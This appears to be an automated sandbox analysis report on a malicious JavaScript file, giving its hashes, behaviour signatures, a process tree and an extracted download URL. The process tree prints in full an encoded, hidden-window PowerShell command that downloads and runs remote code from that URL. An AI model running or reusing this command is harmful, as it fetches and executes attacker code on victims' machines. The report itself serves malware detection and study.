Analysis
-
max time kernel
89s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
28-01-2024 23:51
Static task
static1
Behavioral task
behavioral1
Sample
7e54747e0fac7b55486ab2c10016fd76.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
7e54747e0fac7b55486ab2c10016fd76.js
Resource
win10v2004-20231222-en
General
-
Target
7e54747e0fac7b55486ab2c10016fd76.js
-
Size
89KB
-
MD5
7e54747e0fac7b55486ab2c10016fd76
-
SHA1
91b6baecb68477157418ec7befdc6ebc3f7368b9
-
SHA256
b39be092ca63e53024bacb72c405d4a4cab9d94439501e6ea40a4dc3409d9d4a
-
SHA512
1f6d3471954cb78e9adb39ba13bcc44c57f16133bc41f36d734077bc9665b378e09c7fb501f4e719a6973366d5ba0ca7b8f4dcb32420758555d4ef80c82ff60d
-
SSDEEP
1536:59Ry98guHVBqqg2bcruayUHmLKeZaMU7GwbWBPwVGWl9SZ8kV8Gp/5bzIEN4t/og:59Ry98guHVBqqg2bcruzUHmLKeMMU7Ge
Malware Config
Extracted
http://smart-integrator.hr/pornhub.php
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 8 3268 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation wscript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3268 powershell.exe 3268 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3268 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 4008 wrote to memory of 4784 4008 wscript.exe 89 PID 4008 wrote to memory of 4784 4008 wscript.exe 89 PID 4784 wrote to memory of 3268 4784 cmd.exe 91 PID 4784 wrote to memory of 3268 4784 cmd.exe 91
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\7e54747e0fac7b55486ab2c10016fd76.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4008 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA2⤵
- Suspicious use of WriteProcessMemory
PID:4784 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3268
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82